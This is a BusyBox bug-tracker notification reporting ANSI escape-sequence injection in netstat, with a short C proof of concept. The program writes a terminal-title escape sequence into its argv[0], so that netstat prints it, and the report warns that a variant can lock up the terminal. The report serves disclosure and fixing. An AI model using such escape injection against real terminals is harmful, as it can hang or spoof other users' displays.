[Bug 15922] New: ANSI terminal injection possible in netstat
bugzilla at busybox.net
bugzilla at busybox.net
Sat Jan 20 21:09:18 UTC 2024
https://bugs.busybox.net/show_bug.cgi?id=15922
Bug ID: 15922
Summary: ANSI terminal injection possible in netstat
Product: Busybox
Version: unspecified
Hardware: All
OS: Linux
Status: NEW
Severity: normal
Priority: P5
Component: Networking
Assignee: unassigned at busybox.net
Reporter: rbranco at suse.com
CC: busybox-cvs at busybox.net
Target Milestone: ---
The following code displays a X as the title of an ANSI terminal. Without the
final '\007' the terminal can be locked up.
I think the project in general would benefit from an audit of every line using
/proc/*/cmdline, /proc/*/comm, /proc/*/environ and even the symlinks
/proc/*/exe & cwd.
$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>
int main(int argc, char *argv[]) {
struct sockaddr_in sin;
int s;
if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
err(1, "socket()");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
err(1, "bind()");
strcpy(argv[0], "/\033]0;X\007");
while (1)
sleep(3600);
}
EOF
$ unset PROMPT_COMMAND
$ cc a.c
$ ./a.out &
$ netstat -aup
--
You are receiving this mail because:
You are on the CC list for the bug.
More information about the busybox-cvs
mailing list